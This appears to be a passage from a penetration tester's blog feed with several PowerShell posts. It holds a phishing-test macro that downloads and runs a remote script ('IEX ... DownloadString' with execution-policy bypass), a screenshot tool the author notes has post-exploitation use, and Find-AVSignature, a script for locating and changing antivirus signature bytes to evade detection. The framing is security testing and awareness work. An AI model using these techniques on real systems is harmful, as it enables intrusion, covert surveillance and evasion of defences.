<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIxM2BsKhto7_mEvHZ6zN3K1ql4pLpwwOY1z1sVQpqZFf3_hjmHrtwGO-Ebv1Alf9jlS98Wsx3HvRLJOjp9digZE4XTUrckI1HGG5XloAVgk5vg6mrPRYrtApNV7fKaugSkNWDjR-Lqs8/s1600/Picture5.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="23" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIxM2BsKhto7_mEvHZ6zN3K1ql4pLpwwOY1z1sVQpqZFf3_hjmHrtwGO-Ebv1Alf9jlS98Wsx3HvRLJOjp9digZE4XTUrckI1HGG5XloAVgk5vg6mrPRYrtApNV7fKaugSkNWDjR-Lqs8/s400/Picture5.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/e0Mw9w')</b></td></tr>
</tbody></table>
IEX is an alias for the Invoke-Expression cmdlet and will execute what the .Net WebClient downloads. Pretty simple isn't it? This example usage was borrowed from <a href="http://www.leeholmes.com/blog/">Lee Holmes</a>.<br />
<br />
Since this will only work in the PowerShell console, we need a way to call PowerShell.exe and pass it this script while bypassing the <a href="http://www.obscuresecurity.blogspot.com/2011/08/powershell-executionpolicy.html">PowerShell ExecutionPolicy</a>. Lee posted this easy shortcut to base64 a script block on twitter:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDoOC8s1xgwXGgRrocpWFuZFwGJZNeBAjEtaAZ6jB3xvy6gLRVoquqmJvC1BfoukGC4bamghUGdVdqUn_uANAofJtNeN9mMASUZNEw6ZYVt0ZlSDQFPmKg3sq-ZrUnPc_WakOFJWoOhKo/s1600/Picture6.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="113" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDoOC8s1xgwXGgRrocpWFuZFwGJZNeBAjEtaAZ6jB3xvy6gLRVoquqmJvC1BfoukGC4bamghUGdVdqUn_uANAofJtNeN9mMASUZNEw6ZYVt0ZlSDQFPmKg3sq-ZrUnPc_WakOFJWoOhKo/s400/Picture6.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>(cmd /c echo {ScriptBlock}).split(' ')[1]</b></td></tr>
</tbody></table>
Now we have our encoded script, lets build a command that can be run from cmd.exe:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgphFg7e53zY2yNXcQL9agyFfyYj_A5-yo8EsspOpMB8xn6IsyIuskv8Qz5jMXdOWSmfO5mxZrLdBRidS2exeqkI6F-fELrvDA1BtiqRFSZ48Xxx2qdSXz-2MeQuupq5ZMneGyvCctSNhA/s1600/Picture7.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="70" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgphFg7e53zY2yNXcQL9agyFfyYj_A5-yo8EsspOpMB8xn6IsyIuskv8Qz5jMXdOWSmfO5mxZrLdBRidS2exeqkI6F-fELrvDA1BtiqRFSZ48Xxx2qdSXz-2MeQuupq5ZMneGyvCctSNhA/s400/Picture7.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>PowerShell -Exec Bypass -NoL -Enc $EncodedScript</b></td></tr>
</tbody></table>
Drop that command in the macro and just update the script on Github to make any future changes! Now we can pick our targets and send the email with our attachment.<br />
<br />
Once the attack is detected, the analyst or admin should be able to quarantine the box and retrieve the "marker" which is the script's output. The group as a whole would then be able to get together and discuss what went well and how to get better. Since users will eventually become wary of spreadsheets, you can embed this is other Office products like Word documents or PowerPoint presentations. Also, this same concept can be used to embed the payload into Java applets and PDFs with other tools like the awesome <a href="https://www.trustedsec.com/downloads/social-engineer-toolkit/">SET</a>. Just utilize the same command that was added to the macro with the windows/exec or similar payload.<br />
<br />
I hope other organizations see how easy it is to test their users and admins for awareness and responsiveness. If you have thoughts or questions, please let me know.<br />
<br />
-Chris<br />
<br />
<br />
<br />Chrishttp://www.blogger.com/profile/10815120708533310068noreply@blogger.com1tag:blogger.com,1999:blog-8453453300736107961.post-10915296014239142882013-02-22T00:10:00.000-05:002013-02-22T00:11:29.042-05:00Shmoocon Firetalks and EpilogueIt was great seeing everyone at Shmoocon! I had the honor of presenting at Shmoocon Firetalks and at Shmoocon Epilogue. The slides are posted <a href="http://www.obscuresecurity.blogspot.com/p/presentation-slides.html">here</a> and the PoC code is <a href="https://github.com/obscuresec/shmoocon">here</a>. The Firetalks format only allows for 15 minutes, so I wasn't able to include a demo but I decided to post one online:<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="389" src="http://www.youtube.com/embed/aSrTerXgqxk?feature=player_detailpage" width="480"></iframe><br />
<br />
The actual talk:<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="389" src="http://www.youtube.com/embed/2manBaoP7Bk?feature=player_detailpage" width="480"></iframe><br />
<br />
Shmoocon Epilogue had some awesome talks! I gave the same talk but with an hour at (1:04:16), but you should check out the other talks as well. I will definitely see you at Epilogue next year!<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="389" src="http://www.youtube.com/embed/0huThyLaHOg?feature=player_detailpage&v=0huThyLaHOg#t=3856s" width="480"></iframe>
<br />
Thanks for all the feedback and you guys are awesome!<br />
<br />
-ChrisChrishttp://www.blogger.com/profile/10815120708533310068noreply@blogger.com0tag:blogger.com,1999:blog-8453453300736107961.post-53400584121895075522013-01-14T21:27:00.001-05:002013-08-06T09:46:42.400-04:00Automating Screenshots with PowerShellPenetration tests can become very hectic at a moment's notice. One second you are casually reviewing HTML source for a target website and the next dropping a webshell and hooking browsers before staying up all night trying to gain persistent domain-admin access to the enterprise. Keeping notes during hectic times can be difficult, tedious and potentially distracting. Sometimes, it pays to have something taking notes for you. I like to utilize both a key-logger that does time stamping and take frequent screenshots.<br />
<br />
There are applications that can take screenshots for you at regular intervals and in the past I used an <a href="http://www.autoitscript.com/site/autoit/">AutoIt</a> macro to printscreen and save. That works well when I am on my own machine, but what if I was at a kiosk or doing an insider assessment from one of their workstations? I needed a PowerShell script that could take a screenshot at regular intervals, time stamp it, save it to a file and not tamper with the contents of the clipboard.<br />
<br />
While looking for a good script to start from, I found this <a href="http://gallery.technet.microsoft.com/scriptcenter/eeff544a-f690-4f6b-a586-11eea6fc5eb8">one</a> that uses inline C# which seemed a little over-the-top. Another <a href="http://jdhitsolutions.com/blog/2013/01/powershell-screen-shots/">one</a> seemed simple and straight-forward so I started working with it. After getting the function built, I was quickly annoyed with data from the clipboard disappearing. I knew I had to find another way. After digging through MSDN for an hour, I found the <a href="http://msdn.microsoft.com/en-us/library/system.drawing.bitmap.aspx">Bitmap Class</a> and the <a href="http://msdn.microsoft.com/en-us/library/system.windows.forms.systeminformation.aspx">System Info Class</a>.<br />
<br />
After loading the System.Windows.Forms assembly, I created a function that will be called to take the screenshot and save it to the disk:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhC3PqtvNPSzJAUIDlHfP-CePJ3HUp89HcA03iKaUXK3tUTF7-YJ1HQeZx8D-2xfBR6e_kxPUjHOTURabpjV7r1CAERxwHfVSYxaLSeenzvpJZzcVt3VQEkTU8BKN_Lj3u2XFGOyKqJgVY/s1600/screenshot1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="62" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhC3PqtvNPSzJAUIDlHfP-CePJ3HUp89HcA03iKaUXK3tUTF7-YJ1HQeZx8D-2xfBR6e_kxPUjHOTURabpjV7r1CAERxwHfVSYxaLSeenzvpJZzcVt3VQEkTU8BKN_Lj3u2XFGOyKqJgVY/s400/screenshot1.PNG" width="400" /></a></div>
<br />
Next we need a way to distinguish each file and a way to stamp them with the time it was taken:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEqn9mw287lbh4fY3CWpfP0HG7HnNcZ_iuSAAlHbVzhWSjp59soLY29Enyt2AXyINvT3EKrdmDK-qpqsE62EhODE0m-hSWsq1Iv1DWnG3BAsQTXHAgzaNbtxyli6wt96ViAFe3fFu9-gE/s1600/screenshot2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEqn9mw287lbh4fY3CWpfP0HG7HnNcZ_iuSAAlHbVzhWSjp59soLY29Enyt2AXyINvT3EKrdmDK-qpqsE62EhODE0m-hSWsq1Iv1DWnG3BAsQTXHAgzaNbtxyli6wt96ViAFe3fFu9-gE/s1600/screenshot2.PNG" /></a></div>
<br />
Now we just need to settle on parameters, add this to a do-while loop and wrap the whole thing in a try-catch block. The result is Get-TimedScreenshot:<br />
<br />
<b> Get-TimedScreenshot </b><textarea cols="60" name="Get-TimedScreenshot" readonly="readonly" rows="50" wrap="off">Function Get-TimedScreenshot {
<#
.SYNOPSIS
Get-TimedScreenshot
Author: Chris Campbell (@obscuresec)
License: BSD 3-Clause
.DESCRIPTION
A function that takes screenshots and saves them to a folder.
.PARAMETER $Path
Specifies the folder path.
.PARAMETER $Interval
Specifies the interval in seconds between taking screenshots.
.PARAMETER $EndTime
Specifies when the script should stop running in the format HH-MM
.EXAMPLE
PS C:\> Get-TimedScreenshot -Path c:\temp\ -Interval 30 -EndTime 14:00
.LINK
http://obscuresecurity.blogspot.com/2013/01/Get-TimedScreenshot.html
https://github.com/obscuresec/random/blob/master/Get-TimedScreenshot
#>
[CmdletBinding()] Param(
[Parameter(Mandatory=$True)]
[ValidateScript({Test-Path -Path $_ })]
[string] $Path,
[Parameter(Mandatory=$True)]
[int32] $Interval,
[Parameter(Mandatory=$True)]
[string] $EndTime
)
#Define helper function that generates and saves screenshot
Function GenScreenshot {
$ScreenBounds = [Windows.Forms.SystemInformation]::VirtualScreen
$ScreenshotObject = New-Object Drawing.Bitmap $ScreenBounds.Width, $ScreenBounds.Height
$DrawingGraphics = [Drawing.Graphics]::FromImage($ScreenshotObject)
$DrawingGraphics.CopyFromScreen( $ScreenBounds.Location, [Drawing.Point]::Empty, $ScreenBounds.Size)
$DrawingGraphics.Dispose()
$ScreenshotObject.Save($FilePath)
$ScreenshotObject.Dispose()
}
Try {
#load required assembly
Add-Type -Assembly System.Windows.Forms
Do {
#get the current time and build the filename from it
$Time = (Get-Date)
[string] $FileName = "$($Time.Month)"
$FileName += '-'
$FileName += "$($Time.Day)"
$FileName += '-'
$FileName += "$($Time.Year)"
$FileName += '-'
$FileName += "$($Time.Hour)"
$FileName += '-'
$FileName += "$($Time.Minute)"
$FileName += '-'
$FileName += "$($Time.Second)"
$FileName += '.png'
#use join-path to add path to filename
[string] $FilePath = (Join-Path $Path $FileName)
#run screenshot function
GenScreenshot
Write-Verbose "Saved screenshot to $FilePath. Sleeping for $Interval seconds"
Start-Sleep -Seconds $Interval
}
#note that this will run once regardless if the specified time as passed
While ((Get-Date -Format HH:%m) -lt $EndTime)
}
Catch {Write-Warning "$Error[0].ToString() + $Error[0].InvocationInfo.PositionMessage"}
}
</textarea><br />
<br />
Instead of downloading or installing additional software, we now have a script that will take periodic screenshots. The images can be large so I wouldn't recommend leaving it running overnight, but its great to help you fill in gaps in note-taking at the end of a long hacking session.<br />
<br />
***Updated 8/6/2013: The maintained version of this script can by found within the PowerSploit framework <a href="https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get-TimedScreenshot.ps1">here</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgywjAAB1Mr00-XAEpqhwIRKnz6qdJsUz2ADHcJYBmfJGrORpF3HjDp1e-TuvoxZrFGl703L9R10FQa5d6CZAMawRyLmINLZk-QbAWzxJlVpTuw0ufy-fyjR370TgxZhwIBe3YpUU4nG58/s1600/screenshot3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="336" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgywjAAB1Mr00-XAEpqhwIRKnz6qdJsUz2ADHcJYBmfJGrORpF3HjDp1e-TuvoxZrFGl703L9R10FQa5d6CZAMawRyLmINLZk-QbAWzxJlVpTuw0ufy-fyjR370TgxZhwIBe3YpUU4nG58/s400/screenshot3.PNG" width="400" /></a></div>
<br />
<br />
There is also a clear post-exploitation use for the function. You can schedule it to run and maybe add a <a href="http://blogs.technet.com/b/heyscriptingguy/archive/2005/08/10/how-can-i-tell-if-the-screen-saver-is-active.aspx">check to see if the screensaver is running</a> to make sure you aren't wasting space. I think the function is pretty flexible and with event triggering and an email function could potentially be used as a simple parental alert system. As is, it works for my purposes which is to remind me what I did today. I hope you find it useful and thanks for reading. In case you were wondering, it works well with multiple monitor setups:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZAT8QbcwWtxHSyuO_a9_eV3e2uQuF70aIiTWaCcWoVpV9IMJGnAHjYJ01_TidNBJZ0zYMQbW6p3h9URHdLAfGnkLDBp_A7izcoaVuwQ5MVokJb3p8P99WmUZ16nqf1OGtk57VhWA63UE/s1600/screenshot4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="143" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZAT8QbcwWtxHSyuO_a9_eV3e2uQuF70aIiTWaCcWoVpV9IMJGnAHjYJ01_TidNBJZ0zYMQbW6p3h9URHdLAfGnkLDBp_A7izcoaVuwQ5MVokJb3p8P99WmUZ16nqf1OGtk57VhWA63UE/s400/screenshot4.png" width="400" /></a></div>
<br />
<br />
Please let me know if you have any issues, bugs or questions. Hopefully, I will see you at Shmoocon and Firetalks. Also, if you are in town, check out <a href="http://novahackers.blogspot.com/2013/01/2013-shmoocon-epilogue-speaker-list-and.html">Shmoocon Epilogue</a>. The other talks look really good, but I get the chance to present "No Tools? No Problem! Building a PowerShell Bot." It will cover chaining simple tasks like this one into a nefarious PowerShell script.<br />
<br />
-Chris<br />
<b id="internal-source-marker_0.7408854241948575" style="background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; font-weight: normal; line-height: 20px;"></b>Chrishttp://www.blogger.com/profile/10815120708533310068noreply@blogger.com10tag:blogger.com,1999:blog-8453453300736107961.post-73215359585137556192013-01-10T22:22:00.002-05:002013-01-10T22:22:32.486-05:00Test Antivirus with EICAR and PowerShellTypically, penetration testers are able to demonstrate a complete compromise of their customer's systems without flagging antivirus products. There are many <a href="http://www.obscuresecurity.blogspot.com/2012/12/finding-simple-av-signatures-with.html">methods</a> of bypassing antivirus that can be used, but sometimes customers begin to wonder if their AV is working at all. The<a href="http://en.wikipedia.org/wiki/EICAR_test_file"> EICAR test file</a> is an innocuous file that was created for that exact problem. <br />
<br />
The EICAR test file can be download from <a href="https://secure.eicar.org/eicar.com.txt">here</a>, but it is also trivial to generate yourself. New-Eicar is a PowerShell function that can be used to ensure that your antivirus is properly flagging new files. Originally, I wanted to create a script that would generate the eicar.com file and then wait for it to be deleted. Unfortunately, testing the script resulted in different results based on the different product responses and the product's settings. So I settled on just generating the file and letting the AV product alert (like this):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7_fcZ_Vu8om0_QfjRY98yuUSvl7YXCrTyU5NMDOAg6FBOUazo_DO7nlqZ_PfqTT32R30MwO4NShQpYqhAllvbOd9uMjaQLBxRl29cd4Iq38VEHbAtiVMbSrXZJZ62v01SVjo8vtlpa8U/s1600/avg_alert.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="343" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7_fcZ_Vu8om0_QfjRY98yuUSvl7YXCrTyU5NMDOAg6FBOUazo_DO7nlqZ_PfqTT32R30MwO4NShQpYqhAllvbOd9uMjaQLBxRl29cd4Iq38VEHbAtiVMbSrXZJZ62v01SVjo8vtlpa8U/s400/avg_alert.PNG" width="400" /></a></div>
<br />
Here is the code, but the maintained version will be on <a href="https://github.com/obscuresec/random/blob/master/New-Eicar">github</a>:<br />
<br />
<b> New-Eicar Function </b><textarea cols="60" name="New-Eicar" readonly="readonly" rows="50" wrap="off">function New-Eicar {
<#
.SYNOPSIS
New-Eicar
Author: Chris Campbell (@obscuresec)
License: BSD 3-Clause
.DESCRIPTION
A function that generates the EICAR string to test ondemand scanning of antivirus products.
.PARAMETER $Path
Specifies the path to write the eicar file to.
.EXAMPLE
PS C:\> New-Eicar -Path c:\test
.NOTES
During testing, several AV products caused the script to hang, but it always completed after a few minutes.
.LINK
http://obscuresec.com/2013/01/New-Eicar.html
https://github.com/obscuresec/random/blob/master/New-Eicar
#>
[CmdletBinding()] Param(
[ValidateScript({Test-Path $_ -PathType 'Container'})]
[string]
$Path = "$env:temp\"
)
[string] $FilePath = (Join-Path $Path eicar.com)
#Base64 of Eicar string
[string] $EncodedEicar = 'WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo='
If (!(Test-Path -Path $FilePath)) {
Try {
[byte[]] $EicarBytes = [System.Convert]::FromBase64String($EncodedEicar)
[string] $Eicar = [System.Text.Encoding]::UTF8.GetString($EicarBytes)
Set-Content -Value $Eicar -Encoding ascii -Path $FilePath -Force
}
Catch {
Write-Warning "Eicar.com file couldn't be created. Either permissions or AV prevented file creation."
}
}
Else {
Write-Warning "Eicar.com already exists!"
}
}
</textarea><br />
<br />
Running it on a machine with AV should result in this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOJdqqtj9P89RjxgoLTWK12H8nulzyMmZh5ANGlE7V3mzf_ScExm0lnBuDXSPErwBM0bVDA-uANO0fndtwdfag7o4afb59TonVcmOmw_ESDc-qHoxNJV4A1U-OTgkExay_h_bbgytfXBQ/s1600/AV_alert.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="195" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOJdqqtj9P89RjxgoLTWK12H8nulzyMmZh5ANGlE7V3mzf_ScExm0lnBuDXSPErwBM0bVDA-uANO0fndtwdfag7o4afb59TonVcmOmw_ESDc-qHoxNJV4A1U-OTgkExay_h_bbgytfXBQ/s400/AV_alert.PNG" width="400" /></a></div>
<br />
<br />
Let me know if you have any questions or improvement suggestions!<br />
<br />
-ChrisChrishttp://www.blogger.com/profile/10815120708533310068noreply@blogger.com0tag:blogger.com,1999:blog-8453453300736107961.post-25178441006529352102013-01-07T23:36:00.002-05:002013-01-17T16:46:29.820-05:00Resolve Shortened Links in Bulk with PowerShellRecently, I was working on a task that required resolving hundreds of shortened URLs that were being parsed by another script. Shortened URLs are often used to obscure or hide the actual location from a casual user in the hopes that they will click on it.<br />
<br />
I needed something that could take pipeline input (objects passed from another script) and handle a variety of shortening services and was unable to find anything that met those requirements. Get-ShortenedURL is a PowerShell function that uses .Net to parse out the redirect URL (or more precisely the URI) and return it. Errors aren't really handled in a useful way, so you may want to add a "Write-Verbose" statement if you are interested in error handling.<br />
<br />
<b>Get-ShortenedURL Function</b><textarea cols="60" name="Get-ShortenedURL" readonly="readonly" rows="50" wrap="off">Function Get-ShortenedURL {
<#
.SYNOPSIS
Get-ShortenedURL
Author: Chris Campbell (@obscuresec)
License: BSD 3-Clause
.DESCRIPTION
A function that returns the actual URL from a http redirect.
.PARAMETER $ShortenedURL
Specifies the shortened URL.
.EXAMPLE
PS C:\> Get-ShortenedURL -ShortenedURL http://goo.gl/V4PKq
PS C:\> Get-ShortenedURL -ShortenedURL http://goo.gl/V4PKq,http://bit.ly/IeWSIZ
PS C:\> Get-Content C:\urls.txt | Get-ShortenedURL
PS C:\> Get-ShortenedURL -ShortenedURL (Get-Content C:\urls.txt)
.LINK
http://obscuresecurity.blogspot.com/2013/01/Get-ShortenedURL.html
https://github.com/obscuresec/random/blob/master/Get-ShortenedURL
#>
[CmdletBinding()] Param(
[Parameter(Mandatory=$True,ValueFromPipeline=$True)]
[string[]] $ShortenedURL
)
BEGIN {}
PROCESS {
Try {
#Loop through each URL in the array
Foreach ($URL in $ShortenedURL) {
#Create the WebClient Object and request
$WebClientObject = New-Object System.Net.WebClient
$WebRequest = [System.Net.WebRequest]::create($URL)
$WebResponse = $WebRequest.GetResponse()
#Parse out redirected URL
$ActualDownloadURL = $WebResponse.ResponseUri.AbsoluteUri
#Create custom object to store results
$ObjectProperties = @{ 'Shortened URL' = $URL;
'Actual URL' = $ActualDownloadURL}
$ResultsObject = New-Object -TypeName PSObject -Property $ObjectProperties
#Output the results
Write-Output $ResultsObject
#Close the webclient connection
$WebResponse.Close()
}
}
Catch {}
}
END {}
}
</textarea><br />
<br />
There are serious OPSEC concerns with using this method when dealing with malware or targeted attacks. The script is going to leave a record that it resolved the URL. There are <a href="http://www.untiny.me/">services</a> that can help with that and most shortening sites have an API which exposes the long URL. However, this can be used in a pinch to prevent being sent to a classic music video or to resolve bulk addresses.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEy1SCC5hLLSrVRNHwqTsvBc-Iod2WtezZXn6HBzMOXR_e2EO0s7xdBn-jPEj9Q_jHR4GfnpMFHoLreFlSWp4emKkD9HntrSVLZ0u7djBnQ8RTcfQn6nezhH_1KaSqXVt_2o1FPLGOSeQ/s1600/get-shortened.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="221" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEy1SCC5hLLSrVRNHwqTsvBc-Iod2WtezZXn6HBzMOXR_e2EO0s7xdBn-jPEj9Q_jHR4GfnpMFHoLreFlSWp4emKkD9HntrSVLZ0u7djBnQ8RTcfQn6nezhH_1KaSqXVt_2o1FPLGOSeQ/s400/get-shortened.PNG" width="400" /></a></div>
<br />
<br />
-Chris<br />
<div>
<br /></div>
<br />
<br />
<br />Chrishttp://www.blogger.com/profile/10815120708533310068noreply@blogger.com0tag:blogger.com,1999:blog-8453453300736107961.post-28245609198417679302012-12-12T17:08:00.000-05:002012-12-13T13:05:07.129-05:00Finding Simple AV Signatures with PowerShellAs a penetration tester, one of the best methods of dealing with antivirus products is to avoid them all together. Most AV products work by analyzing binaries that have been written to the disk. If you don't write a PE (i.e. exe, dll, etc...) to the hard drive, you don't have to worry about the majority of AV products. This is typically accomplished by utilizing memory-resident tools such as <a href="https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&cad=rja&sqi=2&ved=0CDwQFjAB&url=http%3A%2F%2Fdev.metasploit.com%2Fdocuments%2Fmeterpreter.pdf&ei=rw_JUMyjCa6M0QH77YHYAg&usg=AFQjCNEJk25Gl2z6b-S3zQD__vFk1FweMA&sig2=Y0pk6w0-Uypbt1cH9WFYFw&bvm=bv.1355272958,d.dmQ">Meterpreter</a> executed with the <a href="http://www.exploit-monday.com/2012/08/powersploit-inject-shellcode-update.html">Inject-Shellcode</a> PowerShell script.<br />
<br />
There could be situations when avoiding a specific AV product is impractical or unnecessary. If the product is strictly signature-based, there are many ways in which a binary can be modified to avoid the signature. There are plenty of tutorials which utilize "crypters" or "binders" to obfuscate a PE from AV, but there can sometimes be an easier way. Several years ago, the tool "<a href="http://heapoverflow.com/f0rums/project.php?issueid=34&filter=changes&page=2">DSplit</a>" was released by class101 which was used to demonstrate how some AV signatures could be bypassed by finding and modifying one byte within the binary. Unfortunately, the original file (and source code?) is no longer available for download by the author. Since the method still works, we decided to create a similar PowerShell script with a few improvements: <br />
<br />
<b>Find-AVSignature Function</b><textarea cols="60" name="Find-AVSignature" readonly="readonly" rows="50" wrap="off">function Find-AVSignature {
<#
.SYNOPSIS
Find-AVSignature
Locates single Byte AV signatures utilizing the same method as DSplit from "class101" on heapoverflow.com
Authors: Chris Campbell (@obscuresec) & Matt Graeber (@mattifestation)
License: BSD 3-Clause
.DESCRIPTION
A script to locate tiny AV signatures.
.PARAMETER Startbyte
Specifies the first byte to begin splitting on.
.PARAMETER Endbyte
Specifies the last byte to split on.
.PARAMETER Interval
Specifies the interval size to split with.
.PARAMETER Path
Specifies the path to the binary you want tested.
.PARAMETER OutPath
Optionally specifies the directory to write the binaries to.
.PARAMETER Force
Forces the script to continue without confirmation.
.EXAMPLE
PS C:\> Find-AVSignature -Startbyte 0 -Endbyte max -Interval 10000 -Path c:\test\exempt\nc.exe
PS C:\> Find-AVSignature -StartByte 10000 -EndByte 20000 -Interval 1000 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run2 -Verbose
PS C:\> Find-AVSignature -StartByte 16000 -EndByte 17000 -Interval 100 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run3 -Verbose
PS C:\> Find-AVSignature -StartByte 16800 -EndByte 16900 -Interval 10 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run4 -Verbose
PS C:\> Find-AVSignature -StartByte 16890 -EndByte 16900 -Interval 1 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run5 -Verbose
.NOTES
Several of the versions of "DSplit.exe" available on the internet contain malware.
.LINK
http://obscuresecurity.blogspot.com/2012/12/finding-simple-av-signatures-with.html
https://github.com/mattifestation/PowerSploit
http://www.exploit-monday.com/
http://heapoverflow.com/f0rums/project.php?issueid=34&filter=changes&page=2
#>
[CmdletBinding()] Param(
[Parameter(Mandatory = $True)] [Int32] $StartByte,
[Parameter(Mandatory = $True)] [String] $EndByte,
[Parameter(Mandatory = $True)] [Int32] $Interval,
[Parameter(Mandatory = $False)] [String] $Path = ($pwd.path),
[Parameter(Mandatory = $False)] [String] $OutPath = ($pwd),
[Switch] $Force = $False
)
#test variables
if (!(Test-Path $Path)) {Throw "File path not found"}
$Response = $True
if (!(Test-Path $OutPath)) {}
if ( $Force -or ( $Response = $psCmdlet.ShouldContinue("The `"$OutPath`" does not exist! Do you want to create the directory?",""))){new-item ($OutPath)-type directory}
if (!$Response) {Throw "Output path not found"}
if (!(Get-ChildItem $Path).Exists) {Throw "File not found"}
[Int32] $FileSize = (Get-ChildItem $Path).Length
if ($StartByte -gt ($FileSize - 1) -or $StartByte -lt 0) {Throw "StartByte range must be between 0 and $Filesize"}
[Int32] $MaximumByte = (($FileSize) - 1)
if ($EndByte -ceq "max") {$EndByte = $MaximumByte}
if ($EndByte -gt $FileSize -or $EndByte -lt 0) {Throw "EndByte range must be between 0 and $Filesize"}
#read in byte array
[Byte[]] $FileByteArray = [System.IO.File]::ReadAllBytes($Path)
#find the filename for the output name
[String] $FileName = (Split-Path $Path -leaf).Split('.')[0]
#Calculate the number of binaries
[Int32] $ResultNumber = [Math]::Floor(($EndByte - $StartByte) / $Interval)
if (((($EndByte - $StartByte) % $Interval)) -gt 0) {$ResultNumber = ($ResultNumber + 1)}
#Prompt user to verify parameters to avoid writing binaries to the wrong directory
$Response = $True
if ( $Force -or ( $Response = $psCmdlet.ShouldContinue("This script will result in $ResultNumber binaries being written to `"$OutPath`"!",
"Do you want to continue?"))){}
if (!$Response) {Return}
Write-Verbose "This script will now write $ResultNumber binaries to `"$OutPath`"."
[Int32] $Number = [Math]::Floor($Endbyte/$Interval)
#write out the calculated number of binaries
[Int32] $i = 0
for ($i -eq 0; $i -lt $ResultNumber; $i++)
{
[Int32] $SplitByte = (($StartByte) + (($Interval) * ($i)))
Write-Verbose "Byte 0 -> $($SplitByte)"
[IO.File]::WriteAllBytes((Join-Path $OutPath "$($FileName)_$($SplitByte).bin"), $FileByteArray[0..($SplitByte)])
}
#Write out the final binary
[IO.File]::WriteAllBytes((Join-Path $OutPath "$($FileName)_$($EndByte).bin"), $FileByteArray[0..($EndByte)])
Write-Verbose "Byte 0 -> $($EndByte)"
Write-Verbose "Files written to disk. Flushing memory."
#During testing using large binaries, memory usage was excessive so lets fix that
[System.GC]::Collect()
Write-Verbose "Completed!"
}</textarea><br />
<br />
<div class="separator" style="clear: both; text-align: left;">
To demonstrate how to use the function, we will take the <a href="http://joncraton.org/blog/46/netcat-for-windows">Netcat</a> for Windows binary and avoid the signature in Symantec's AV. Obviously, an easier way to avoid AV is to modify the source code and recompile, but its a good example nonetheless. To utilize the function, copy and paste it into PowerShell. Next create a folder exemption within the AV product so that you can write it safely to the disk and create a custom scan folder in order to output the split binaries to (or allow the script to do it for you).</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The next step is to run the function against the binary and output several binary files starting from the first byte (0) and ending with progressively larger file sizes. For this example, we are specifying the parameters for StartByte (0), EndByte (max) and Interval (10000). The verbose output illustrates how the file is being created when written to disk: </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
